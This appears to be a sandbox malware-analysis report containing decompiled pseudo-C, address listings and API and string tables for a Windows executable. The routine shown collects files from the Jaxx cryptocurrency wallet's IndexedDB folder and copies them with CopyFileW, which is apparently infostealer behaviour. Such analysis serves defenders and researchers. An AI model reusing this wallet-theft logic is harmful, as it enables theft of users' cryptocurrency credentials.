                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t324;
                                                                                				E0040C606(_t324,  *0x449c70);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t325 = _t324 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t325;
                                                                                				E0040C606(_t325,  *0x449f58);
                                                                                				_t326 = _t325 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xd;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t326;
                                                                                				E0040C606(_t326,  *0x449c54);
                                                                                				_t327 = _t326 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xe;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t327;
                                                                                				E0040C606(_t327,  *0x449c70);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t328 = _t327 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t328;
                                                                                				E0040C606(_t328,  *0x449f6c);
                                                                                				_t329 = _t328 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0xf;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t329;
                                                                                				E0040C606(_t329,  *0x449c54);
                                                                                				_t330 = _t329 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x10;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t330;
                                                                                				E0040C606(_t330,  *0x449c70);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t331 = _t330 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t331;
                                                                                				E0040C606(_t331,  *0x449f48);
                                                                                				_t332 = _t331 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x11;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t332;
                                                                                				E0040C606(_t332,  *0x449f80);
                                                                                				_t333 = _t332 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x12;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t333;
                                                                                				E0040C606(_t333,  *0x449e94);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t334 = _t333 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t334;
                                                                                				E0040C606(_t334,  *0x449e84);
                                                                                				_t335 = _t334 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x13;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t335;
                                                                                				E0040C606(_t335,  *0x449fdc);
                                                                                				_t336 = _t335 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x14;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t336;
                                                                                				E0040C606(_t336,  *0x449d18);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t337 = _t336 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t337;
                                                                                				E0040C606(_t337,  *0x449c38);
                                                                                				_t338 = _t337 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x15;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t338;
                                                                                				E0040C606(_t338,  *0x449de8);
                                                                                				_t339 = _t338 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x16;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t339;
                                                                                				E0040C606(_t339,  *0x449f38);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t340 = _t339 - 0x1c;
                                                                                				_t269 = _t340;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t340;
                                                                                				 *((intOrPtr*)(_t269 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t269 + 0x10)) = 0;
                                                                                				 *_t269 = 0;
                                                                                				E0040381A(_t269, "*.*");
                                                                                				_t341 = _t340 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x17;
                                                                                				_t270 = _t341;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t341;
                                                                                				 *((intOrPtr*)(_t270 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t270 + 0x10)) = 0;
                                                                                				 *_t270 = 0;
                                                                                				E0040381A(_t270, "Jaxx_New");
                                                                                				_t342 = _t341 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x18;
                                                                                				_t271 = _t342;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t342;
                                                                                				 *((intOrPtr*)(_t271 + 0x14)) = _t301;
                                                                                				 *((intOrPtr*)(_t271 + 0x10)) = 0;
                                                                                				 *_t271 = 0;
                                                                                				E0040381A(_t271, "\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb\\");
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t343 = _t342 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t343;
                                                                                				E0040C606(_t343,  *0x449f68);
                                                                                				_t344 = _t343 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x19;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t344;
                                                                                				E0040C606(_t344,  *0x449d34);
                                                                                				_t345 = _t344 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1a;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t345;
                                                                                				E0040C606(_t345,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t346 = _t345 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t346;
                                                                                				E0040C606(_t346,  *0x449b80);
                                                                                				_t347 = _t346 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1b;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t347;
                                                                                				E0040C606(_t347,  *0x449d34);
                                                                                				_t348 = _t347 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t348;
                                                                                				E0040C606(_t348,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t349 = _t348 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t349;
                                                                                				E0040C606(_t349,  *0x449c04);
                                                                                				_t350 = _t349 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1d;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t350;
                                                                                				E0040C606(_t350,  *0x449d34);
                                                                                				_t351 = _t350 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1e;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t351;
                                                                                				E0040C606(_t351,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t352 = _t351 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t352;
                                                                                				E0040C606(_t352,  *0x449ea0);
                                                                                				_t353 = _t352 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x1f;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t353;
                                                                                				E0040C606(_t353,  *0x449d34);
                                                                                				_t354 = _t353 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x20;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t354;
                                                                                				E0040C606(_t354,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t355 = _t354 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t355;
                                                                                				E0040C606(_t355,  *0x449c60);
                                                                                				_t356 = _t355 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x21;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t356;
                                                                                				E0040C606(_t356,  *0x449d34);
                                                                                				_t357 = _t356 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x22;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t357;
                                                                                				E0040C606(_t357,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t358 = _t357 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t358;
                                                                                				E0040C606(_t358,  *0x449d84);
                                                                                				_t359 = _t358 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x23;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t359;
                                                                                				E0040C606(_t359,  *0x449d34);
                                                                                				_t360 = _t359 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x24;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t360;
                                                                                				E0040C606(_t360,  *0x449c34);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t361 = _t360 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t361;
                                                                                				E0040C606(_t361,  *0x449f64);
                                                                                				_t362 = _t361 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x25;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t362;
                                                                                				E0040C606(_t362,  *0x449cec);
                                                                                				_t363 = _t362 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x26;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t363;
                                                                                				E0040C606(_t363,  *0x449fd8);
                                                                                				_push(0);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t364 = _t363 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t364;
                                                                                				E0040C606(_t364,  *0x449f9c);
                                                                                				_t365 = _t364 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x27;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t365;
                                                                                				E0040C606(_t365,  *0x449be8);
                                                                                				_t366 = _t365 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x28;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t366;
                                                                                				E0040C606(_t366,  *0x449c6c);
                                                                                				_push(1);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				_t367 = _t366 - 0x1c;
                                                                                				 *((intOrPtr*)(_t305 - 0x18)) = _t367;
                                                                                				E0040C606(_t367,  *0x449db8);
                                                                                				_t368 = _t367 - 0x1c;
                                                                                				 *((char*)(_t305 - 4)) = 0x29;
                                                                                				 *((intOrPtr*)(_t305 - 0x10)) = _t368;
                                                                                				E0040C606(_t368,  *0x449be8);
                                                                                				 *((char*)(_t305 - 4)) = 0x2a;
                                                                                				 *((intOrPtr*)(_t305 - 0x14)) = _t368 - 0x1c;
                                                                                				E0040C606(_t368 - 0x1c,  *0x449c6c);
                                                                                				_push(1);
                                                                                				_push(_t303);
                                                                                				 *((char*)(_t305 - 4)) = 0;
                                                                                				E0040D762(0, _t301, _t303, 0);
                                                                                				E00402C34(_t305 + 8, 1, 0);
                                                                                				return E00421A4D( *((intOrPtr*)(_t303 + 0x1c)));
                                                                                			}










































































                                                                                0x0040dbba
                                                                                0x0040dbc1
                                                                                0x0040dbc6
                                                                                0x0040dbd0
                                                                                0x0040dbd4
                                                                                0x0040dbd7
                                                                                0x0040dbdc
                                                                                0x0040dbe1
                                                                                0x0040dbea
                                                                                0x0040dbef
                                                                                0x0040dbf2
                                                                                0x0040dbf8
                                                                                0x0040dc01
                                                                                0x0040dc06
                                                                                0x0040dc09
                                                                                0x0040dc0f
                                                                                0x0040dc18
                                                                                0x0040dc1d
                                                                                0x0040dc1e
                                                                                0x0040dc1f
                                                                                0x0040dc22
                                                                                0x0040dc27
                                                                                0x0040dc2a
                                                                                0x0040dc2c
                                                                                0x0040dc31
                                                                                0x0040dc32
                                                                                0x0040dc35
                                                                                0x0040dc3d
                                                                                0x0040dc3f
                                                                                0x0040dc44
                                                                                0x0040dc47
                                                                                0x0040dc4d
                                                                                0x0040dc56
                                                                                0x0040dc5b
                                                                                0x0040dc5e
                                                                                0x0040dc64
                                                                                0x0040dc6d
                                                                                0x0040dc72
                                                                                0x0040dc73
                                                                                0x0040dc74
                                                                                0x0040dc77
                                                                                0x0040dc7c
                                                                                0x0040dc7f
                                                                                0x0040dc81
                                                                                0x0040dc84
                                                                                0x0040dc87
                                                                                0x0040dc8f
                                                                                0x0040dc91
                                                                                0x0040dc96
                                                                                0x0040dc99
                                                                                0x0040dc9f
                                                                                0x0040dca8
                                                                                0x0040dcad
                                                                                0x0040dcb0
                                                                                0x0040dcb6
                                                                                0x0040dcbf
                                                                                0x0040dcc4
                                                                                0x0040dcc5
                                                                                0x0040dcc6
                                                                                0x0040dcc9
                                                                                0x0040dcce
                                                                                0x0040dcd3
                                                                                0x0040dcdc
                                                                                0x0040dce1
                                                                                0x0040dce4
                                                                                0x0040dcea
                                                                                0x0040dcf3
                                                                                0x0040dcf8
                                                                                0x0040dcfb
                                                                                0x0040dd01
                                                                                0x0040dd0a
                                                                                0x0040dd0f
                                                                                0x0040dd10
                                                                                0x0040dd11
                                                                                0x0040dd14
                                                                                0x0040dd19
                                                                                0x0040dd1e
                                                                                0x0040dd27
                                                                                0x0040dd2c
                                                                                0x0040dd2f
                                                                                0x0040dd35
                                                                                0x0040dd3e
                                                                                0x0040dd43
                                                                                0x0040dd46
                                                                                0x0040dd4c
                                                                                0x0040dd55
                                                                                0x0040dd5a
                                                                                0x0040dd5b
                                                                                0x0040dd5c
                                                                                0x0040dd5f
                                                                                0x0040dd64
                                                                                0x0040dd69
                                                                                0x0040dd72
                                                                                0x0040dd77
                                                                                0x0040dd7a
                                                                                0x0040dd80
                                                                                0x0040dd89
                                                                                0x0040dd8e
                                                                                0x0040dd91
                                                                                0x0040dd97
                                                                                0x0040dda0
                                                                                0x0040dda5
                                                                                0x0040dda6
                                                                                0x0040dda7
                                                                                0x0040ddaa
                                                                                0x0040ddaf
                                                                                0x0040ddb4
                                                                                0x0040ddbd
                                                                                0x0040ddc2
                                                                                0x0040ddc5
                                                                                0x0040ddcb
                                                                                0x0040ddd4
                                                                                0x0040ddd9
                                                                                0x0040dddc
                                                                                0x0040dde2
                                                                                0x0040ddeb
                                                                                0x0040ddf0
                                                                                0x0040ddf1
                                                                                0x0040ddf2
                                                                                0x0040ddf5
                                                                                0x0040ddfa
                                                                                0x0040ddff
                                                                                0x0040de08
                                                                                0x0040de0d
                                                                                0x0040de10
                                                                                0x0040de16
                                                                                0x0040de1f
                                                                                0x0040de24
                                                                                0x0040de27
                                                                                0x0040de2d
                                                                                0x0040de36
                                                                                0x0040de3b
                                                                                0x0040de3c
                                                                                0x0040de3d
                                                                                0x0040de40
                                                                                0x0040de45
                                                                                0x0040de4a
                                                                                0x0040de53
                                                                                0x0040de58
                                                                                0x0040de5b
                                                                                0x0040de61
                                                                                0x0040de6a
                                                                                0x0040de6f
                                                                                0x0040de72
                                                                                0x0040de78
                                                                                0x0040de81
                                                                                0x0040de86
                                                                                0x0040de87
                                                                                0x0040de88
                                                                                0x0040de8b
                                                                                0x0040de90
                                                                                0x0040de95
                                                                                0x0040de9e
                                                                                0x0040dea3
                                                                                0x0040dea6
                                                                                0x0040deac
                                                                                0x0040deb5
                                                                                0x0040deba
                                                                                0x0040debd
                                                                                0x0040dec3
                                                                                0x0040decc
                                                                                0x0040ded1
                                                                                0x0040ded2
                                                                                0x0040ded3
                                                                                0x0040ded6
                                                                                0x0040dedb
                                                                                0x0040dee0
                                                                                0x0040dee9
                                                                                0x0040deee
                                                                                0x0040def1
                                                                                0x0040def7
                                                                                0x0040df00
                                                                                0x0040df05
                                                                                0x0040df08
                                                                                0x0040df0e
                                                                                0x0040df17
                                                                                0x0040df1c
                                                                                0x0040df1d
                                                                                0x0040df1e
                                                                                0x0040df21
                                                                                0x0040df26
                                                                                0x0040df29
                                                                                0x0040df2b
                                                                                0x0040df2e
                                                                                0x0040df31
                                                                                0x0040df39
                                                                                0x0040df3b
                                                                                0x0040df40
                                                                                0x0040df43
                                                                                0x0040df47
                                                                                0x0040df49
                                                                                0x0040df4c
                                                                                0x0040df4f
                                                                                0x0040df57
                                                                                0x0040df59
                                                                                0x0040df5e
                                                                                0x0040df61
                                                                                0x0040df65
                                                                                0x0040df67
                                                                                0x0040df6a
                                                                                0x0040df6d
                                                                                0x0040df75
                                                                                0x0040df77
                                                                                0x0040df7c
                                                                                0x0040df7d
                                                                                0x0040df7e
                                                                                0x0040df81
                                                                                0x0040df86
                                                                                0x0040df8b
                                                                                0x0040df94
                                                                                0x0040df99
                                                                                0x0040df9c
                                                                                0x0040dfa2
                                                                                0x0040dfab
                                                                                0x0040dfb0
                                                                                0x0040dfb3
                                                                                0x0040dfb9
                                                                                0x0040dfc2
                                                                                0x0040dfc7
                                                                                0x0040dfc8
                                                                                0x0040dfc9
                                                                                0x0040dfcc
                                                                                0x0040dfd1
                                                                                0x0040dfd6
                                                                                0x0040dfdf
                                                                                0x0040dfe4
                                                                                0x0040dfe7
                                                                                0x0040dfed
                                                                                0x0040dff6
                                                                                0x0040dffb
                                                                                0x0040dffe
                                                                                0x0040e004
                                                                                0x0040e00d
                                                                                0x0040e012
                                                                                0x0040e013
                                                                                0x0040e014
                                                                                0x0040e017
                                                                                0x0040e01c
                                                                                0x0040e021
                                                                                0x0040e02a
                                                                                0x0040e02f
                                                                                0x0040e032
                                                                                0x0040e038
                                                                                0x0040e041
                                                                                0x0040e046
                                                                                0x0040e049
                                                                                0x0040e04f
                                                                                0x0040e058
                                                                                0x0040e05d
                                                                                0x0040e05e
                                                                                0x0040e05f
                                                                                0x0040e062
                                                                                0x0040e067
                                                                                0x0040e06c
                                                                                0x0040e075
                                                                                0x0040e07a
                                                                                0x0040e07d
                                                                                0x0040e083
                                                                                0x0040e08c
                                                                                0x0040e091
                                                                                0x0040e094
                                                                                0x0040e09a
                                                                                0x0040e0a3
                                                                                0x0040e0a8
                                                                                0x0040e0a9
                                                                                0x0040e0aa
                                                                                0x0040e0ad
                                                                                0x0040e0b2
                                                                                0x0040e0b7
                                                                                0x0040e0c0
                                                                                0x0040e0c5
                                                                                0x0040e0c8
                                                                                0x0040e0ce
                                                                                0x0040e0d7
                                                                                0x0040e0dc
                                                                                0x0040e0df
                                                                                0x0040e0e5
                                                                                0x0040e0ee
                                                                                0x0040e0f3
                                                                                0x0040e0f4
                                                                                0x0040e0f5
                                                                                0x0040e0f8
                                                                                0x0040e0fd
                                                                                0x0040e102
                                                                                0x0040e10b
                                                                                0x0040e110
                                                                                0x0040e113
                                                                                0x0040e119
                                                                                0x0040e122
                                                                                0x0040e127
                                                                                0x0040e12a
                                                                                0x0040e130
                                                                                0x0040e139
                                                                                0x0040e13e
                                                                                0x0040e13f
                                                                                0x0040e140
                                                                                0x0040e143
                                                                                0x0040e148
                                                                                0x0040e14d
                                                                                0x0040e156
                                                                                0x0040e15b
                                                                                0x0040e15e
                                                                                0x0040e164
                                                                                0x0040e16d
                                                                                0x0040e172
                                                                                0x0040e175
                                                                                0x0040e17b
                                                                                0x0040e184
                                                                                0x0040e189
                                                                                0x0040e18a
                                                                                0x0040e18b
                                                                                0x0040e18e
                                                                                0x0040e193
                                                                                0x0040e198
                                                                                0x0040e1a1
                                                                                0x0040e1a6
                                                                                0x0040e1a9
                                                                                0x0040e1af
                                                                                0x0040e1b8
                                                                                0x0040e1bd
                                                                                0x0040e1c0
                                                                                0x0040e1c6
                                                                                0x0040e1cf
                                                                                0x0040e1d4
                                                                                0x0040e1d6
                                                                                0x0040e1d7
                                                                                0x0040e1da
                                                                                0x0040e1df
                                                                                0x0040e1e4
                                                                                0x0040e1ed
                                                                                0x0040e1f2
                                                                                0x0040e1f5
                                                                                0x0040e1fb
                                                                                0x0040e204
                                                                                0x0040e20c
                                                                                0x0040e212
                                                                                0x0040e21b
                                                                                0x0040e220
                                                                                0x0040e222
                                                                                0x0040e223
                                                                                0x0040e226
                                                                                0x0040e234
                                                                                0x0040e240

                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040DBC1
                                                                                  • Part of subcall function 00403C13: std::_Xinvalid_argument.LIBCPMT ref: 00403C2D
                                                                                  • Part of subcall function 0040D762: __EH_prolog3_GS.LIBCMT ref: 0040D76C
                                                                                  • Part of subcall function 0040D762: __wgetenv.LIBCMT ref: 0040D7A3
                                                                                  • Part of subcall function 0040D762: GetFileAttributesW.KERNEL32(00000000,?,?,00000001,00000000,00000001,00000000,00000001,00000000), ref: 0040D91F
                                                                                  • Part of subcall function 0040D762: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,00000001,00000000,?,?,?,?,00000000), ref: 0040D9B1
                                                                                  • Part of subcall function 0040D762: CopyFileW.KERNEL32(00000000,00000000,00000001,?,?,?,?,00000001,00000000,00000001,00000000,?,?,?,?,00000000), ref: 0040DAA1
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesCopyCreateDirectoryH_prolog3H_prolog3_Xinvalid_argument__wgetenv_memmovestd::_
                                                                                • String ID: *$*.*$Jaxx_New$\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                                                                • API String ID: 290217350-2103950858
                                                                                • Opcode ID: caa5b19ec0c3c496e99b47f8301448a62473dfd3b8b22cb05e174c5c020ebacb
                                                                                • Instruction ID: 05a260073a854c815c53b6d5365e35fc3c66cc9d62196e6e4635d6c501dac989
                                                                                • Opcode Fuzzy Hash: caa5b19ec0c3c496e99b47f8301448a62473dfd3b8b22cb05e174c5c020ebacb
                                                                                • Instruction Fuzzy Hash: D9123370D01285EACB11BF7DCA4759E7EB59B06344F2401AEF401376A2C67A4F18A7EE
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00418889(void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t219;
                                                                                				intOrPtr* _t220;
                                                                                				intOrPtr _t226;
                                                                                				signed int _t232;
                                                                                				char* _t233;
                                                                                				void* _t237;
                                                                                				signed int _t239;
                                                                                				void* _t241;
                                                                                				void* _t242;
                                                                                				intOrPtr* _t245;
                                                                                				intOrPtr* _t246;
                                                                                				intOrPtr* _t258;
                                                                                				intOrPtr* _t259;
                                                                                				intOrPtr* _t261;
                                                                                				intOrPtr _t263;
                                                                                				intOrPtr* _t269;
                                                                                				intOrPtr* _t270;
                                                                                				intOrPtr* _t274;
                                                                                				intOrPtr* _t275;
                                                                                				signed int _t277;
                                                                                				intOrPtr* _t278;
                                                                                				intOrPtr* _t281;
                                                                                				char* _t283;
                                                                                				intOrPtr _t289;
                                                                                				signed int _t291;
                                                                                				intOrPtr _t292;
                                                                                				signed int _t294;
                                                                                				char* _t296;
                                                                                				intOrPtr _t301;
                                                                                				signed int _t303;
                                                                                				intOrPtr* _t305;
                                                                                				intOrPtr* _t313;
                                                                                				intOrPtr _t314;
                                                                                				char* _t324;
                                                                                				intOrPtr* _t344;
                                                                                				void* _t352;
                                                                                				intOrPtr* _t355;
                                                                                				void* _t365;
                                                                                				void* _t370;
                                                                                				void* _t371;
                                                                                				void* _t373;
                                                                                				void* _t374;
                                                                                				void* _t375;
                                                                                				void* _t379;
                                                                                				void* _t382;
                                                                                				intOrPtr _t397;
                                                                                
                                                                                				_t382 = __eflags;
                                                                                				E004219DE(E00435DE0, __ebx, __edi, __esi);
                                                                                				 *((char*)(_t370 - 0x7c)) =  *((intOrPtr*)(_t370 + 0xc));
                                                                                				 *(_t370 - 0x5c) =  *(_t370 + 0x10);
                                                                                				 *(_t370 - 0x64) =  *(_t370 + 0x14);
                                                                                				 *(_t370 - 0x58) =  *(_t370 + 0x18);
                                                                                				_t301 = __ecx;
                                                                                				_t344 = __edx;
                                                                                				 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 + 0x1c));
                                                                                				 *((intOrPtr*)(_t370 - 0x80)) = __ecx;
                                                                                				 *((intOrPtr*)(_t370 - 0x50)) = __edx;
                                                                                				_t219 = E0040F3F7(__ecx, _t370 - 0x8c);
                                                                                				 *(_t370 - 4) =  *(_t370 - 4) & 0x00000000;
                                                                                				_t220 = E004191E8(_t301, __edx, _t370 - 0x8c, _t382);
                                                                                				 *(_t370 - 4) =  *(_t370 - 4) | 0xffffffff;
                                                                                				_t355 = _t220;
                                                                                				 *((intOrPtr*)(_t370 - 0x74)) = _t355;
                                                                                				E00407D49(_t370 - 0x8c);
                                                                                				E00419135(_t355, _t370 - 0x48);
                                                                                				 *(_t370 - 4) = 1;
                                                                                				_t313 = _t355;
                                                                                				 *((char*)(_t370 - 0x70)) =  *((intOrPtr*)( *_t355 + 8))(_t219, 0x84);
                                                                                				 *((intOrPtr*)(_t370 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t370 - 0x1c)) = 0;
                                                                                				 *((char*)(_t370 - 0x2c)) = 0;
                                                                                				 *(_t370 - 4) = 2;
                                                                                				_t226 =  *_t344;
                                                                                				if(_t226 == 0x2b) {
                                                                                					L2:
                                                                                					 *(_t370 - 0x84) = 1;
                                                                                					L3:
                                                                                					 *((char*)(_t370 - 0x60)) =  *((intOrPtr*)( *((intOrPtr*)(E00420F19(_t301, 0, _t384)))));
                                                                                					 *((short*)(_t370 - 0x5f)) = 0x65;
                                                                                					 *(_t370 - 0x54) = E0041F230(_t344, 0x65,  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                					_t232 = E0041F230(_t344,  *((char*)(_t370 - 0x60)),  *((intOrPtr*)(_t370 - 0x4c)));
                                                                                					_t373 = _t371 + 0x18;
                                                                                					 *(_t370 - 0x68) = _t232;
                                                                                					if(_t232 == 0) {
                                                                                						 *(_t370 - 0x58) = 0;
                                                                                					}
                                                                                					_t233 =  *((intOrPtr*)(_t370 - 0x48));
                                                                                					if( *((intOrPtr*)(_t370 - 0x34)) < 0x10) {
                                                                                						_t233 = _t370 - 0x48;
                                                                                					}
                                                                                					if( *_t233 == 0x7f) {
                                                                                						L32:
                                                                                						_t314 =  *((intOrPtr*)(_t301 + 0x20));
                                                                                						_t237 =  *(_t370 - 0x58) +  *((intOrPtr*)(_t370 - 0x4c)) +  *(_t370 - 0x64) +  *(_t370 - 0x5c);
                                                                                						_t397 =  *((intOrPtr*)(_t301 + 0x24));
                                                                                						if(_t397 < 0 || _t397 <= 0 && _t314 <= 0 || _t314 <= _t237) {
                                                                                							 *(_t370 - 0x54) = 0;
                                                                                						} else {
                                                                                							 *(_t370 - 0x54) = _t314 - _t237;
                                                                                						}
                                                                                						_t239 =  *(_t301 + 0x14) & 0x000001c0;
                                                                                						if(_t239 != 0x40) {
                                                                                							if(_t239 == 0x100 &&  *(_t370 - 0x84) > 0) {
                                                                                								_t281 = E00419074(_t344, _t370 - 0x6c,  *((intOrPtr*)(_t370 + 0x20)),  *((intOrPtr*)(_t370 + 0x24)), 1);
                                                                                								_t301 =  *((intOrPtr*)(_t370 - 0x80));
                                                                                								_t373 = _t373 + 0xc;
                                                                                								 *((intOrPtr*)(_t370 - 0x50)) =  *((intOrPtr*)(_t370 - 0x50)) + 1;
                                                                                								 *((intOrPtr*)(_t370 - 0x4c)) =  *((intOrPtr*)(_t370 - 0x4c)) - 1;
                                                                                								_t344 =  *((intOrPtr*)(_t370 - 0x50));
                                                                                								 *((intOrPtr*)(_t370 + 0x20)) =  *_t281;
                                                                                								 *((intOrPtr*)(_t370 + 0x24)) =  *((intOrPtr*)(_t281 + 4));
                                                                                							}
